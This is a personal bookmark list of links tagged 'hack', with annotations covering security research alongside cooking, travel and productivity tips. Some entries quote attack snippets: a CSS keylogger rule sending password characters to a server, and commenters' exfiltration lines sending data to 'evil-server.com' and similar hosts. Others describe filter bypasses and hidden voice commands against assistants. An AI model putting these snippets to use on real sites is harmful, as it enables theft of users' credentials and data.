dandv + hack   134

Subtle visual cues nudge users to reveal more in online forums | Penn State University
"218 participants from Amazon Mechanical Turk using an online sexual health forum featuring icons that implied a sense of crowd size and connectivity, revealed more sensitive information than visitors to a site without those visual cues"

"The researchers used a dynamic graphic representation of people standing in a crowd to convey crowd size. The size of the crowd suggested by the icon changed randomly for participants so that they were not merely jumping on the bandwagon of a large crowd, according to the researchers. The connectivity icon showed a network map with one circle labeled "You" to suggest the participant's place in the network. This icon also changed randomly."
psychology  webdesign  user  profile  information  disclosure  hack  influence 
4 days ago by dandv
Pure CSS Font
"For private, SEO-hidden, CAPTCHA-friendly unselectable text.
Deter plagiarism and spambots!"

Yep. Good luck selecting that text.
CSS  hack  synthetic  font  cool 
october 2018 by dandv
GoogleMeetRoulette: Joining random meetings - Martin Vigo
"on average it takes 25 minutes to try all 10k PINs and find 15 different valid PINs for 15 different meetings for a cost of $16"

hack  Google  Meet  conference  dial 
october 2018 by dandv
maxchehab/CSS-Keylogging: Chrome extension and Express server that exploits keylogging abilities of CSS.
Works only on sites that set the value of input fields, e.g. use React to have controlled components.

See https://github.com/maxchehab/CSS-Keylogging/issues/2

input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
CSS  keylogger  security  cool  hack 
august 2018 by dandv
jbtronics/CrookedStyleSheets: Webpage tracking only using CSS (and no JS)
Link tracking, OS detection via specific fonts, measurement of hover duration etc.

#link2:active::after {
content: url("track.php?action=link2_clicked");
tracking  analytics  CSS  hack 
august 2018 by dandv
Solved with CSS! Logical Styling Based on the Number of Given Elements | CSS-Tricks
The CSS equivalent of array.join(', '):

/* Adds semicolon after each item except the last item */
li:first-child:nth-last-child(n + 1) ~ li::before {
content: ',';

Also, how to make a carousel show a conditional number of items, based on screen width (no media queries)
CSS  hack  list 
july 2018 by dandv
I’m harvesting credit card numbers and passwords from your site. Here’s how.
Extremely legit concern.


* npm package compromises did happen, e.g.
* https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
* https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
* https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
`window.open(‘https://legit-analytics.com?q=${payload}', ‘_blank’).close()` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.

* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front facing Node.js servers had little limitations to what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet..


* "At the end of the day, if you can do document.location = https://evil-server.com/bounce?q=data (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use insertRule to add some css.
e.g. something::after { content:url(“evilserver.com/userdatastring”) }"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open-source  cool 
july 2018 by dandv
Alexa (Amazon Echo) and Google Home infinite loop conversation - YouTube
1. Mute Echo.
2. "Hey Google repeat after me Alexa Simon Says Hey Google repeat that"
3. Unmute Echo.
voice  assistant  hack  fun 
june 2018 by dandv
How to clean a ceiling fan in 60 seconds - CNET
Wrap tongs in clothing rags and secure with rubber bands
clean  fan  blades  hack  DIY 
june 2018 by dandv
Alexa and Siri Can Hear This Hidden Command. You Can’t. - The New York Times
Subliminal messages against machines

[[researchers can make a self-driving car swerve or speed up simply by pasting small stickers on road signs and confusing the vehicle’s computer vision system

Smartphones and smart speakers that use digital assistants like Amazon’s Alexa or Apple’s Siri are set to outnumber people by 2021, according to the research firm Ovum. And more than half of all American households will have at least one smart speaker by then, according to Juniper Research.

DolphinAttack: researchers at Princeton University and China’s Zhejiang University demonstrated that voice-recognition systems could be activated by using frequencies inaudible to the human ear. The attack first muted the phone so the owner wouldn’t hear the system’s responses, either

ultrasound attacks from 25 feet away. While the commands couldn’t penetrate walls, they could control smart devices through open windows from outside a building.

This year, another group of Chinese and American researchers from China’s Academy of Sciences and other institutions, demonstrated they could control voice-activated devices with commands embedded in songs
digital  assistant  security  hack  voice  recognition 
may 2018 by dandv
The Feds Can Now (Probably) Unlock Every iPhone Model In Existence
http://web.archive.org/web/20180227055404/https://media.cellebrite.com/wp-content/uploads/2017/12/advanced-unlocking-extraction-datasheet-jan2018.pdf = http://archive.is/hUH0x

"Cellebrite Advanced Unlocking Services is the industry’s only solution for overcoming many types of complex locks on market-leading devices. This can determine or disable the PIN, pattern, password screen locks or passcodes on the latest Apple iOS and Google Android devices.
Cellebrite makes the world’s first and only decrypted physical extraction capability possible for leading Apple iOS and Google Android devices. These new capabilities enable forensic practitioners to retrieve the full file system to recover downloaded emails, third-party application data, geolocation data and system logs, without needing to jailbreak or root the device."
Cellebrite  iPhone  security  hack  unlock  bypass  fingerprint  USA  police  state 
february 2018 by dandv
Searching for Bitcoins in GitHub repositories with Google BigQuery - YouTube
Fun with coding - hacking together a Google BigQuery to look for Bitcoin private keys accidentally uploaded to GitHub repos, then running the addresses to see how much money they have.

Turns out nothing of value was found, and the processing of that amount of data cost more than the tiny amounts he found.
Google  BigQuery  Bitcoin  leak  hack  fun  video 
december 2017 by dandv
iOS Privacy: steal.password - Easily get the user's Apple ID password, just by asking — Felix Krause
Super easy to phish iOS users to type their password in a "Sign In" dialog that looks identical to the system one
Apple  iOS  phishing  hack 
october 2017 by dandv
Unicode Text Converter
Convert regular text to readable Unicode variations that bypass word filters
bypass  word  filter  Unicode  hack  text 
september 2017 by dandv
AMP Messenger
Chat app built with amp-live-list
AMP  demo  hack 
july 2017 by dandv
A Profitable Way to Stop Telemarketers | Now I Know
Register a pay-to-call 1-800 number and give THAT away to any institution, so when they leak it, telemarketers have to pay YOU.
against  telemarketers  hack  cool  fun 
july 2017 by dandv
Sprites mods - Hard disk hacking - Software flashing
I needed to find a way to re-flash the chip while it was still soldered to the hard disk, preferably from the PC the hard disk was connected to.

The Western Digital firmware upgrade tools proves this is possible: it's basically a tool you run under DOS to put new firmware to both the flash and the service area aka the reserved sectors of the hard disk. 

With the firmware hack in place, however, the attacker could tell the hard disk to do something nefarious with the new install. He'd need to trigger that behaviour first, though, and that could be done by writing a certain magic string the firmware hack would look for to the disk. The magic string can be in any file; the attacker could for example upload a .jpeg-file with the string in it to the server. He could also request a file from the webserver with the magic string appended to the URL. That would eventually end up in the logs of the machines, triggering the exploit.

The hard disk firmware hack would then do something nefarious. For example, it could wait for the machine to read out the file /etc/shadow, where all the passwords are stored on an Unix/Linux system, and modify the contents on-the-fly to something the attacker hardcoded earlier. When the attacker would then try to log into the system with his own password, the machine would check this password against the now-modified /etc/shadow and the attacker would be free to login again.
hard  disk  controller  firmware  hack  security 
july 2017 by dandv
How to Make Eggs in the Microwave - Scrambled Eggs in the Microwave
Microwaved eggs taste better in blind tests than stove top cooked ones, when poached or hard boiled

Testers couldn't guess which was egg was poached in the microwave at a first glance. After tasting, they agreed that the flavor was the same, but the texture of the microwave-poached eggs was actually BETTER.

They loved how the microwave boiled egg developed that "fudgy yellow yolk" and actually preferred it to the stovetop egg.
microwave  eggs  food  hack 
july 2017 by dandv
Cloak and Dagger: From Two Permissions to Complete Control of the UI Feedback Loop
Any app can steal your passwords by drawing fake login controls on top of other apps, using some a11y BS that Android provides and Google won't fix/remove because too many popular apps use (e.g. Facebook's chat heads).

Google Play has approved demo apps that abuse this.

To mitigate, check periodically what apps have permission to draw on other apps:

Settings -> Gear/Overflow menu -> Special access -> Draw over other apps OR Apps that can appear on top
Android  vulnerability  hack  security 
may 2017 by dandv
Hidden Voice Commands
"deliver a message to Google Assistant-enabled Android phones nearby through bursts of what sounds like scratchy static. if you don’t know you’re listening for words, you might not even know what just happened

Hidden voice commands can cause more damage than just a false text or silly tweet. An iPhone whose owner has already linked Siri to a Venmo account, for example, will send money in response to a spoken instruction. Or a voice command could tell a device to visit a website that automatically downloads malware." -- https://www.theatlantic.com/technology/archive/2017/01/the-demon-voice-that-can-talk-to-your-smartphone/513743
hack  attack  voice  assistant  Siri  hidden  command  exploit 
january 2017 by dandv
Use the Zeigarnik Effect to do and learn anything faster
The brain dislikes unfinished tasks and craves closure. So when the time comes to go to sleep or go to a meeting, do so enthusiastically, because:

1) in the meantime your subconscious will work on the problem
2) you'll be excited to resume in the morning / after the meeting
3) the actual effect is that the brain remembers better interrupted tasks (http://wesscholar.wesleyan.edu/cgi/viewcontent.cgi?article=1286&context=div3facpubs)

Kill the "maker vs. manager time" dread of interruptions!

For the best effect, interrupt on a high note ("when the going is good")

"I never come back to a blank page; I always finish about halfway through. To be confronted with a blank page is not very nice. But Hemingway, a great American writer, taught me the finest trick when you are doing a long book, which is, he simply said in his own words, “When you are going good, stop writing.
And that means that if everything’s going well and you know exactly where the end of the chapter’s going to go and you know just what the people are going to do, you don’t go on writing and writing and writing until you come to the end of it, because when you do, then you say, well, where am I going to go next? And you get up and you walk away and you don’t want to come back because you don’t know where you want to go." - Roald Dahl
paradigm-shift  productivity  interruptions  solution  learning  hack  psychology 
january 2017 by dandv
The $5 PoisonTap quickly, completely hijacks even a locked computer’s internet | TechCrunch
[[PoisonTap connects to the USB port and announces itself not as a USB device, but an Ethernet interface. The computer, glad to switch over from battery-sucking Wi-Fi, sends a DHCP request, asking to be assigned an IP.

Your computer, being dumb, just accepts this at face value and sends data to the fake IPs on PoisonTap instead of to the actual websites and services. And you don’t even have to be there: pre-loaded items like analytics and ads will be active, and as soon as one of them sends an HTTP request — BAM, PoisonTap responds with a barrage of data-caching malicious iframes for the top million Alexa sites. And those iframes, equipped with back doors, stick around until someone clears them out.]]
hack  USB  fake  Ethernet 
november 2016 by dandv
Skip the Oven—Microwave Your Fish « Food Hacks Daily
3-5 minutes with a teaspoon of liquid in a covered microwave dish so no steam escapes
food  hack  microwave  fish 
november 2016 by dandv
USB Rubber Ducky Deluxe – HakShop
Looks like a thumb drive, but it's actually a keyboard that injects whatever commands you want.

Plug it in and you're kind.

Demonstrates that if someone has physical access to your machine, you've lost.

See http://security.stackexchange.com/questions/137496/how-can-empty-usb-sticks-contain-malware
hack  USB  keyboard  device 
september 2016 by dandv
Breaking bad habits by hijacking the transitions your brain undergoes
When a transition occurs (eg. getting home from work), think "No. Right. Now": Reject everything What is the right thing you should do? Do it right now The brain is especially susceptible to this when transitions occur (changes of context).
productivity  brain  mind  hack  break  habits 
september 2016 by dandv
OPM Now Admits 5.6m Feds’ Fingerprints Were Stolen By Hackers | WIRED
"Of the 21.5 million individuals whose Social Security Numbers and other sensitive information were impacted by the breach, the subset of individuals whose fingerprints have been stolen has increased from a total of approximately 1.1 million to approximately 5.6 million."
hack  data  leak  federal  fingerprints  against  biometrics 
august 2016 by dandv
Rules Are Flexible — Medium
Don't follow the rules, but break them in a smart way.

[[my friend and decided to start a computer club in our school. We came up with a presentation outlining our key points and goals, and prepared to present it to the principal of our school.

The two of us are fairly well known in our own grade. However, in a school of almost a thousand students, our juniors are unlikely to know us as much as we’d like. Since the club we are starting depends on membership across the entire school, we decided on a simple PR stunt: walk around the entire day wearing a suit, and not tell anyone why.

Our logic behind this is simple. If you stick out like a sore thumb the entire day, people will take notice. If you further this by refusing to tell them why, their curiosity only increases. Finally, when you go up announce for enrollment in the new society, people see you on stage and remember you as the two guys roaming around in suits.

The problem with this plan was that we were quite sure that we’d never get permission to wear suits if we asked. So we decided on a simple solution: Don’t ask for permission. Though the school has a uniform and rules to ensure students wear it (even people wearing incorrect socks are made to buy them and change their socks in school), we were able to pull it off following a very simple rule: Act like it’s supposed to be that way.

There are two things that worked to our advantage here. First, showing up in a suit gives observers more pause for thought than showing up in a Batman costume. The latter is something that the class clown might do, and teachers will no doubt question it. However, showing up in a suit is something teachers do not expect without a reason, and they’re going to be more apprehensive when calling you out on it. Second, whenever we did get called out on it, we gave evasive excuses such as, “There’s a reason! I promise!” or “I’m joining the Men In Black”. This worked because it left teachers confused, and they’re unlikely to have you change out of a suit just in case you actually have a reason for it. After all, who needlessly wears a suit to school?

The entire plan worked out perfectly. The students took notice, the teachers took notice, and everyone grew curious. To top it off, the principal loved our presentation, and how we went to the trouble of doing it in a formal manner.

The point of this example is that rules are sometimes flexible. If you carry yourself in a manner that says your behaviour has purpose, most people won’t stop you. They’ll simply assume that you are indeed supposed to be doing this. If you treat rules as flexible it gives you a lot more freedom to build your ideas and execute them.]]
hack  social  rules  behavior  suit  school 
august 2016 by dandv
The Security Issues In The Indian Election System — Medium
[[1. It is not only possible, but extremely easy to retrieve the PDF electoral rolls for every state and union territory in India, which contain the personal information of every registered voter.

2. These PDFs can then be processed in a matter of minutes to produce details like Addresses, names, father’s name, gender, age and voters ID number for every single registered voter of India]]

-- all this hacked by a (brilliant) 17yo.
India  voters  personal  details  data  information  hack  leak  Sood 
august 2016 by dandv
Inspectors: IRS lost 490 laptops, many with unencrypted data | Ars Technica
[[111 laptops were stolen within IRS facilities

"one employee who retired in March 2006 had full access rights to the non-IRS off-site facility when we visited in July 2006"

the IRS was warned about unencrypted data back in 2003 but did not take "adequate corrective actions"]]

Treasury report: https://www.treasury.gov/tigta/auditreports/2007reports/200720048fr.html
PDF: https://www.treasury.gov/tigta/auditreports/2007reports/200720048fr.pdf
IRS  hack  data  leak  identify  theft 
august 2016 by dandv
CiteSeerX — ACCessory: Password Inference using Accelerometers on Smartphones ∗
"We show that accelerometer measurements can be used to extract 6-character passwords in as few as 4.5 trials (median)."

The accelerometer doesn't require any special permissions, and it's a sufficiently high resolution sensor to, for example, o identify when users are holding their phones together (Bump, Are you with me?, Smart-Its Friends), or detect sleep cycles. Using machine learning, keypresses can be identified based on accelerometer reading patterns.

"A real-world implementation of this attack would have to address several sources of variability such as different hand sizes, typing styles, screen sizes, and keyboard user interfaces

It is prudent to consider an adversary with more resources that is willing to invest the extra time needed to develop a robust eavesdropping application with these stealthy properties. Our model represents a proof-of-concept design to demonstrate that this
is a real threat.

Our results indicate that a small fraction of passwords can be cracked in a limited number of trials (e.g., 1 of 99 passwords was cracked in 1 attempt and 6 of 99 in 4.5 median attempts). Attackers can perform this attack in a scalable manner where cracking just 1% of passwords can be lucrative."
cool  hack  accelerometer  out  of  band  signal  keyboard  sniffing  mobile  phone  password 
july 2016 by dandv
Using the HTML5 Fullscreen API for Phishing Attacks » Feross.org
Simulate the browser chrome based on the detected OS and present a full-screen replica of a sensitive site to the user
cool  full  screen  browser  phishing  hack 
july 2016 by dandv
Row hammer - Wikipedia, the free encyclopedia
[[One of the revealed exploits targets the Google Native Client (NaCl) mechanism for running a limited subset of x86-64 machine instructions within a sandbox,[14]:27 exploiting the row hammer effect to escape from the sandbox and gain the ability to issue system calls directly.

The second exploit revealed by Project Zero runs as an unprivileged Linux process on the x86-64 architecture, exploiting the row hammer effect to gain unrestricted access to all physical memory installed in a computer. By combining the disturbance errors with memory spraying, this exploit is capable of altering page table entries (PTEs)[14]:35 used by the virtual memory system for mapping virtual addresses to physical addresses, which results in the exploit gaining unrestricted memory access.[14]:34,36–57 Due to its nature and the inability of the x86-64 architecture to make clflush a privileged machine instruction, this exploit can hardly be mitigated on computers that do not use hardware with built-in row hammer prevention mechanisms.]]
exploit  hack  security  access  RAM  escape  sandbox  awareness 
june 2016 by dandv
Samsung Galaxy S7 Galaxy S6 fingerprint scanner hack discovered | BGR
"Once you’ve printed out the spoofed fingerprint on special AgIC paper, you can just press it down on Samsung and Huawei’s fingerprint scanners and it will unlock the device"
Samsung  fingerprint  scanner  hack  defeat  bypass  security 
april 2016 by dandv
Two Items That Aren't On Your Meeting Agenda, But Should Be | Fast Company | Business + Innovation
Start meetings with 5 minutes of pleasantries, and end with a quick recap of what went well
meeting  agenda  improve  hack  social  time 
march 2016 by dandv
Inspect Element: How to Temporarily Edit Any Webpage
Neat uses for Chrome DevTools for non-programmers.

Ctrl+Shift+F: search in *all* files of a site. Use cases: search for a color (e.g. check if an old color is still used, if you're a designer), then tweak it.
web  site  hack  tweak  development  DevTools 
march 2016 by dandv
Database configuration issues expose 191 million voter records | CSO Online
Largest breach yet?

"The database contains a voter's full name (first, middle, last), their home address, mailing address, a unique voter ID, state voter ID, gender, date of birth, date of registration, phone number, a yes/no field for if the number is on the national do-not-call list, political affiliation, and a detailed voting history since 2000. In addition, the database contains fields for voter prediction scores."

See also http://www.csoonline.com/article/3018592/security/database-configuration-issues-expose-191-million-voter-records.html
data  leak  breach  voter  records  hack  database 
december 2015 by dandv
Why getting a tax refund is a bad thing — Medium
"instead of aiming for a refund celebration each year, adjust your withholdings so that you owe the maximum amount allowed without penalty ($1,000) come April’s deadline"

Article doesn't mention HOW to do this - but maximize the number of deductions in your W4 (3?). Deposit the extra money and accrue the interest, *then* pay the IRS what they want.
tax  deductions  maximize  W4  IRS  legal  hack 
december 2015 by dandv
Global Gender War | Scott Adams Blog
[[You want a linguistic kill shot to end DAESH recruiting? I don’t have the details worked out, but perhaps something along the lines of…

"If you kill infidels, you will be rewarded with virgins in heaven. But if you kill your own leaders today – the ones holding the leash on your balls – you can have access to women tomorrow. And tomorrow is sooner."

Teens aren’t good at planning ahead.]]
against  ISIS  recruiting  faith  ideology  idea  battle  cool  hack  Scott  Adams  women  verbal  jiujitsu 
november 2015 by dandv
Almost None of the Women in the Ashley Madison Database Ever Used the Site
"About two-thirds of the men, or 20.2 million of them, had checked the messages in their accounts at least once. But only 1,492 women had ever checked their messages. It was a serious anomaly."
Ashley  Madison  fake  female  women  profiles  hack  scandal 
august 2015 by dandv
There's An Android Peeing On Apple On Google Maps
User slipped a change past the Google Map Maker approval idiots.
Google  Maps  Android  pee  Apple  fun  hack 
april 2015 by dandv
Console.image() in Chrome
Crazy hack to enable outputting images to the Chrome console. Seen in the wild at http://map.baidu.com
Chrome  console  image  hack  cool 
april 2015 by dandv
Kitchen hacks for preservation and preparation - Quora
Lots of tips, e.g.

"After cutting into a cake, use toothpicks to cover the exposed portion with piece of bread. The bread will get hard and stale, but the cake will stay nice and soft."

Wrap banana crowns in plastic wrap. They’ll keep for 3-5 days longer than usual.
kitchen  food  hack  tips  cool 
april 2015 by dandv
Striket̶h̶r̶o̶u̶g̶h̶ text for Facebook & Twitter
Nifty Unicode hacks: strikethrough, underline, overline, cross hatch
Unicode  text  effect  hack  transform 
march 2015 by dandv
China Eastern Airlines passenger uses first class ticket for free meals
Chinese man walked into the first class lounge, dined, then walked out. He changed his flight itinerary more than 300 times within the year so he could enjoy the facilities.
fun  airport  first  class  hack 
march 2015 by dandv
Unintended data sensed by smartphone sensors can leak information
Power consumption varies with distance from cell towers, so different routes have different enough power consumption profiles that random apps sucking power randomly can be filtered out.

Even with the microphone disabled, the phone's gyroscope can pick up enough vibration to discern the gender of the user, and even digits spoken.
cool  exploit  hack  sensor  smartphone  security 
february 2015 by dandv
Generate a file to download purely on the client
...using setAttribute data:base64..., download -> file, then click()
cool  JavaScript  download  file  client  hack 
november 2014 by dandv
GitHub hacked, millions of projects at risk of being modified or deleted
"it’s highly likely that Egor Homakov was not the first person to exploit GitHub in this way. We would’ve heard about it if a large project had been deleted out of the blue — but maybe hackers have been quietly modifying code bases for their own, nefarious ends."
GitHub  hacked  hack  code  security  exploit  backdoor  open  source 
november 2014 by dandv
How To Get Cheaper Plane Tickets By Using A Fake Location
Set the location of the site you're buying from to some other country than the US. Translate the site if necessary, or use a VPN. Pay in the local currency with a card that doesn't charge currency conversion fees.
airfare  airplane  plane  flight  tickets  hack  cheap  low  price 
october 2014 by dandv
What is different about being targeted by a professional attacker?
The attacker has a larger budget and more time and people to dedicate to the attack than you have. Also, he has to win only once but you have to win every time.
targeted  attack  security  hack 
october 2014 by dandv
Compromising Electromagnetic Emanations of Wired and Wireless Keyboards - Martin Vuagnoux and Sylvain Pasini
"We found 4 different ways (including the Kuhn attack) to fully or partially recover keystrokes from wired keyboards at a distance up to 20 meters, even through walls. We tested 12 different wired and wireless keyboard models bought between 2001 and 2008 (PS/2, USB and laptop). They are all vulnerable to at least one of our 4 attacks.

We conclude that wired and wireless computer keyboards sold in the stores generate compromising emanations (mainly because of the cost pressures in the design). Hence they are not safe to transmit sensitive information. No doubt that our attacks can be significantly improved, since we used relatively inexpensive equipments."
wireless  wired  keyboard  sniffing  surveillance  security  hack 
october 2014 by dandv
This thumbdrive hacks computers. “BadUSB” exploit makes devices turn “evil” | Ars Technica
Attack code resides in the firmware and is impossible to remove by formatting, or even detect, short of disassembling the unit. Consider a USB keyboard. It sends keystrokes when you type... but it could send them at any time. And that firmware is reprogrammable. It can inject a payload into files copied on it, but it doesn't even have to do that. One physical device can provide more USB peripherals (remember the 3G sticks that are also a storage card with drivers?) The target controller is made by Phison Electronics, one of largest manufacturers. The only defense is to always have physical possession of USB devices, and to assume that manufacturers haven't implemented back doors at the request of governments.

Code at https://github.com/adamcaudill/Psychson

[[USB drive, for instance, will take on the ability to act as a keyboard that surreptitiously types malicious commands into attached computers. A different drive will similarly be reprogrammed to act as a network card that causes connected computers to connect to malicious sites impersonating Google, Facebook or other trusted destinations

it's almost impossible to detect a tampered device without employing advanced forensic methods, such as physically disassembling and reverse engineering the device. Antivirus scans will turn up empty. Most analysis short of sophisticated techniques rely on the firmware itself, and that can't be trusted.

"There's no way to get the firmware without the help of the firmware, and if you ask the infected firmware, it will just lie to you," Nohl explained.

Reformatting an infected USB stick, for example, will do nothing to remove the malicious programming. Because the tampering resides in the firmware, the malware can be eliminated only by replacing the booby-trapped device software with the original firmware. Given the possibility that traditional computer malware could be programmed to use BadUSB techniques to infect any attached devices, the attack could change the entire regimen currently used to respond to computer compromises.

"The next time you have a virus on your computer, you pretty much have to assume your peripherals are infected, and computers of other people who connected to those peripherals are infected," Nohl said. He said the attack is similar to boot sector infections affecting hard drives and removable storage. A key difference, however, is that most boot sector compromises can be detected by antivirus scans. BadUSB infections can not.
awareness  security  hack  badUSB  USB  malware 
october 2014 by dandv
JavaScript hack
Run this in the browser console, F12:

JavaScript  hack  fun 
august 2014 by dandv
Unitools. Unicode mapping, mappers, maps. Unicode Tools, Utilities. Unicode Manipulate, Manipulation. Unicode Fonts, Glyphs. Fraktur Font. Full Width Unicode. Unicode Escape. Entities. UTF8 Convert. Unicode Conversion, Mangling. ASCII.
Zalgo text generator using Unicode combined diacritics, and other Unicode-based fuckups:

Ꮷòìлg ϻy tâxès Ꮷrïvés ϻe nuts!

˙˙˙uʍop ǝpısdn sı plɹoʍ ǝɥʇ

H̷̳͔̖̘͚͙̹ͭ̓̉̏͡ȇ҉̡̯͕̟'͕̭̂̍ͨş͍̯͉̥̤͖͎͌͛̉͌̀ͦ͐ ̸̢͉̜̦̝͇̙̐ͪ̏̔̿̐̚c̀̅ͭ̎҉͇̰͇̠̙̝͔̯ơ̷͈͍̿̔̋̀m̡̗̣̻͎̾ͭͤͩͯ̂i̹̯̩͙̦̺̬̯̾̆̾͆͂̽ͤ̑̆͠͠ṇ͈̝̅̒͆͌͟g̰͕͌̉̂ ͎͚̲ͩ̌̌ͬͫ͑̈́ͪ̊́a̤̮͚̥̽̾̑ͫͥ̋͋ͬf̛̛̰̺̫̏͆t̙̤͌̎͊̈̒͟ȅ̵̛̝̝̭̬̎ͫ̐͞r̩̮̪̗̍ͤͥ͆̏ͩ͋ͩ̎͠ ̪͇̦̓̀̆ͅy̲̮̬ͨ̽ȯ̃̅͏̲̖̼̩ų̵̯̮̘̦͎̰͆̓ͫ̏ͪͤ̽̎!̢̰͇̟̲̾̾ͫ̄ͭ

Multi-line Zalgo at http://www.eeemo.net/

Super tall Zalgo text, some Tha character with lots of Unicode combining characters after it. ส็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็

GitHub: https://github.com/sohiggo/www.unicod.es
Unicode  hack  character  tools  convert  encode  fun  Zalgo 
february 2014 by dandv
New attack steals e-mail decryption keys by capturing computer sounds | Ars Technica
Fucking cool. Inferring 4096-bit RSA keys by listening to the CPU whine while GnuPG decrypting a known message
cool  security  crypto  break  RSA  acoustic  exploit  side  channel  OOB  sound  noise  decrypt  crack  hack 
february 2014 by dandv
Hacking cars and taking control, even remotely
With access to a car's data port, one can jerk the steering wheel, slam the brakes at any speed, disable the breaks, disable power steering, show false speed and odometer info, drain the battery etc.

Other tests have shown that remote access is possible via cellular networks like OnStar, Bluetooth, and even the CD player: http://www.nytimes.com/2011/03/10/business/10hack.html
car  hack  hacking  remote  control  wireless 
january 2014 by dandv
GPS spoofing used to hack into UAV drone
DHS challenged University of Texas at Austin to hack into a drone, and they did it. The drone belonged to UT, not to the government.
hack  drone  UAV  GPS  spoofing 
december 2013 by dandv
Cooling palms enhances training during progressive resistive exercise
"Palm cooling from 35 degrees C to 20 degrees C temporarily overrides fatigue mechanism(s) during intense intermittent resistance exercise. The mechanisms for this ergogenic function remain unknown."

"Palm cooling was associated with increased exercise repetitions and exercise volume, possibly related to a delayed central fatigue or to a peripheral counter-irritation effect."

More at https://repository.unm.edu/handle/1928/9811
palm  cooling  increase  enhance  exercise  performance  weight  resistance  training  boost  cool  hack 
december 2013 by dandv
Using Hidden City and Throwaway Ticketing to Save Big Money on Airfare - View from the Wing - View from the Wing
You can often purchase a connecting ticket through a hub that is significantly cheaper than a flight just to that hub. Deplane in the hub.

When flying hub1-to-hub2, book instead a hub1-to-spoke flight that goes through hub2, and never take the last leg flight.

* obviously, don't check bags
* don't run the risk of your carryon being gate-checked, because it will be checked for your final destination
* do this only for the return trip of round-trip tickets, because if you don't board any leg of your flight, the airline will cancel your entire trip
* alternatively, book one-ways with separate airlines
* the worst that can happen is that the airline cancels your frequent flyer account or bans you, if you use the hack too frequently. Just use another airline.
* matrix.itasoftware.com and Kayak let you specify the city to fly through

Airlines forbid it, except Southwest and possibly Jetblue.

Mirror at: http://archive.is/2NcHn

[[1. Look to employ the switcheroo when your final destination is at a hub airport dominated by just one or two carriers, like Atlanta, Cleveland, Salt Lake City, Charlotte, Detroit, Cincinnati or Chicago O’Hare, all of which have overpriced tickets.

2. When you’re traveling to one of those cities, you should search for phantom flights into airports that are more competitive — New York, Miami, Las Vegas and Boston are good examples. Search engines like Kayak.com will allow you to select your routing through your desired layover airport.]]
-- http://www.nytimes.com/2011/05/08/magazine/mag-08subversion-t.html
cool  flight  air  travel  plane  booking  hack  cheap  ticket 
september 2013 by dandv
Can you get an MIT education for $2,000?: Scott Young at TEDxEastsidePrep - YouTube
You can build MIT's CompSci curriculum almost entire from their free online courses and exams. Play the courses at 1.5x speed and use the rewind button when needed - something live students can't do in class. You can watch lectures that span 4 months in 2 days. You don't have to wait for the results to your assignments for weeks. Quick feedback benefits learning.

Use a timelog and realize that a student wastes large amounts of time commuting from class to class or otherwise not actually learning.

If you're disciplined, you can get a CS degree in only 1 years instead of 4, and paying only $2k for textbooks.

Refers to http://online.wsj.com/article/SB10001424052970203358704577237603853394654.html for time logging.
TEDx  video  against  formal  education  college  university  self  learning  hacking  hack 
august 2013 by dandv
Triple Your Personal Productivity by Steve Pavlina
Parkinson's Law applied to productivity, a story. Time log, realize how inefficient you are, the cut back on "work time". You'll force yourself to become more efficient, akin to those who do a lot the day before they leave for vacation.

Efficiency Ratio = (Time Doing "Real Work") / (Time Spent "At Work")

"In fact, trying harder actually de-motivated me and drove my efficiency ratio even lower. So I reluctantly decided to try the opposite approach. The next day I would only allow myself to put in five hours total at the office, and the rest of the day I wouldn't allow myself to work at all. Well, an interesting thing happened, as I'm sure you can imagine. My brain must have gotten the idea that working time was a scarce commodity because I worked almost the entire five hours straight and got an efficiency ratio of over 90%. I continued this experiment for the rest of the week and ended up getting about 25 hours of work done with only 30 hours total spent in my office, for an efficiency ratio of over 80%. So I was able to reduce my weekly working time by 30 hours while also getting 10 more hours of real work done. If your time log shows your efficiency ratio to be on the low side, try severely limiting your total amount of working time for a day, and see what happens. Once your brain realizes that working time is scarce, you suddenly become a lot more efficient because you have to be. When you have tight time constraints, you will usually find a way to get your work done. But when you have all the time in the world, it's too easy to be inefficient."

Gradually increase total hours while maintaining peak efficiency.

